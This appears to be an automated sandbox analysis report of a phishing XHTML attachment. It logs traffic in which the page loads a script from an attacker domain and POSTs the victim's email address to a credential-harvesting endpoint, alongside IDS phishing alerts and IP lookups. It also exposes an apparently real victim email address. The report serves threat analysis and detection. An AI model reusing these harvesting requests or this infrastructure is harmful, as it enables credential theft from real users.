2025-03-25 16:16:08 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49800	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:08 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:16:08 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:08 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb6038eb4ad1b-EWR server-timing: cfL4;desc="?proto=TCP&rtt=106608&min_rtt=105002&rtt_var=24565&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=33909&cwnd=234&unsent_bytes=0&cid=74259b8ebee40238&ts=269&x=0"
2025-03-25 16:16:08 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49801	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:08 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
2025-03-25 16:16:08 UTC	495	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:08 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:16:08 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49802	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:08 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:16:08 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:08 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb606ac89c329-EWR server-timing: cfL4;desc="?proto=TCP&rtt=107083&min_rtt=103331&rtt_var=25705&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=36022&cwnd=241&unsent_bytes=0&cid=530b2a6677f46075&ts=268&x=0"
2025-03-25 16:16:08 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49803	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:16 UTC	634	OUT	POST /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive Content-Length: 43 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: application/x-www-form-urlencoded; charset=UTF-8 sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:16:16 UTC	43	OUT	Data Raw: 61 69 3d 72 65 62 65 63 63 61 2e 6b 61 72 70 69 6e 6f 73 25 34 30 6a 75 6e 6b 6c 65 73 73 66 6f 6f 64 73 2e 63 6f 6d 26 70 72 3d Data Ascii: ai=rebecca.karpinos%40junklessfoods.com&pr=
2025-03-25 16:16:16 UTC	559	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:16 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Set-Cookie: PHPSESSID=441e9699fd80abb02393181c4d16e915; path=/ Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:16:16 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49805	104.26.12.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:16 UTC	549	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: application/json, text/javascript, /; q=0.01 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Origin: null Sec-Fetch-Site: cross-site Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:16:16 UTC	467	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:16 GMT Content-Type: application/json Content-Length: 21 Connection: close Access-Control-Allow-Origin: * Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb639cd76f3ba-EWR server-timing: cfL4;desc="?proto=TCP&rtt=107659&min_rtt=105354&rtt_var=25694&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=1121&delivery_rate=33155&cwnd=198&unsent_bytes=0&cid=1022536e1029fb27&ts=275&x=0"
2025-03-25 16:16:16 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49806	104.168.138.190	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:17 UTC	441	OUT	GET /kuk/xwps.php HTTP/1.1 Host: avcbtech.site Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=d169b87746488742ce07a3956dbf3449
2025-03-25 16:16:17 UTC	495	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:17 GMT Server: Apache X-Powered-By: PHP/7.4.33 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Access-Control-Allow-Origin: * Access-Control-Allow-Methods: POST, GET, OPTIONS Access-Control-Allow-Headers: Content-Type, Authorization, X-Requested-With Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: application/json
2025-03-25 16:16:17 UTC	74	IN	Data Raw: 33 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 65 72 72 6f 72 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 45 6d 61 69 6c 20 61 6e 64 20 70 61 73 73 77 6f 72 64 20 61 72 65 20 72 65 71 75 69 72 65 64 2e 22 7d 0d 0a 30 0d 0a 0d 0a Data Ascii: 3f{"status":"error","message":"Email and password are required."}0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.4	49807	104.26.13.205	443	5340	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-25 16:16:17 UTC	389	OUT	GET /?format=json HTTP/1.1 Host: api.ipify.org Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 16:16:17 UTC	434	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 16:16:17 GMT Content-Type: application/json Content-Length: 21 Connection: close Vary: Origin cf-cache-status: DYNAMIC Server: cloudflare CF-RAY: 925fb63e8c257cb1-EWR server-timing: cfL4;desc="?proto=TCP&rtt=102891&min_rtt=102021&rtt_var=22831&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2816&recv_bytes=961&delivery_rate=35596&cwnd=209&unsent_bytes=0&cid=dc5b28f46fbb29a3&ts=270&x=0"
2025-03-25 16:16:17 UTC	21	IN	Data Raw: 7b 22 69 70 22 3a 22 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d Data Ascii: {"ip":"161.77.13.20"}

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe

Click to jump to process

Click to jump to process

Target ID:	1
Start time:	12:13:01
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	12:13:02
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2032,i,11957968465846349411,11465432592597063295,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2012 /prefetch:3
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	12:13:09
Start date:	25/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\#Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml"
Imagebase:	0x7ff786830000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: Yara match	File source: 0.5.pages.csv, type: HTML
Source: Yara match	File source: 0.6.pages.csv, type: HTML
Source: Yara match	File source: 0.3.pages.csv, type: HTML
Source: Yara match	File source: 0.4.pages.csv, type: HTML

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: New script, src: https://office.avcbtech.store/kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com

Source: #Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml	HTTP Parser: .location
Source: #Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml	HTTP Parser: .location

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: HTML title missing
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: HTML title missing

Source: #Ud83d#Udd0aAudio_Msg Junklessfoods.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No favicon
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No favicon

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="author".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="author".. found

Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="copyright".. found
Source: file:///C:/Users/user/Desktop/%23Ud83d%23Udd0aAudio_Msg%20Junklessfoods.xhtml	HTTP Parser: No <meta name="copyright".. found

Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49750 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49778 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49798 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49769 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49757 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49793 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49803 -> 104.168.138.190:443
Source: Network traffic	Suricata IDS: 2847819 - Severity 1 - ETPRO PHISHING Successful Generic Phish 2021-03-25 : 192.168.2.4:49787 -> 104.168.138.190:443

Source: Joe Sandbox View	IP Address: 185.174.100.20 185.174.100.20
Source: Joe Sandbox View	IP Address: 199.232.196.193 199.232.196.193
Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137
Source: Joe Sandbox View	IP Address: 151.101.66.137 151.101.66.137

Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 131.253.33.254
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.64.99
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 20.189.173.27
Source: unknown	TCP traffic detected without corresponding DNS query: 2.17.190.73
Source: unknown	TCP traffic detected without corresponding DNS query: 204.79.197.222
Source: unknown	TCP traffic detected without corresponding DNS query: 142.250.64.99

Source: global traffic	HTTP traffic detected: GET /kuk/xls/k1u2k.js?uid=rebecca.karpinos@junklessfoods.com HTTP/1.1Host: office.avcbtech.storeConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /start/xls/includes/css6.css HTTP/1.1Host: sender.linxcoded.topConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /jquery-3.1.1.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageSec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /0HdPsKK.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /KAb5SEy.png HTTP/1.1Host: i.imgur.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: application/json, text/javascript, /; q=0.01sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: nullSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?format=json HTTP/1.1Host: api.ipify.orgConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
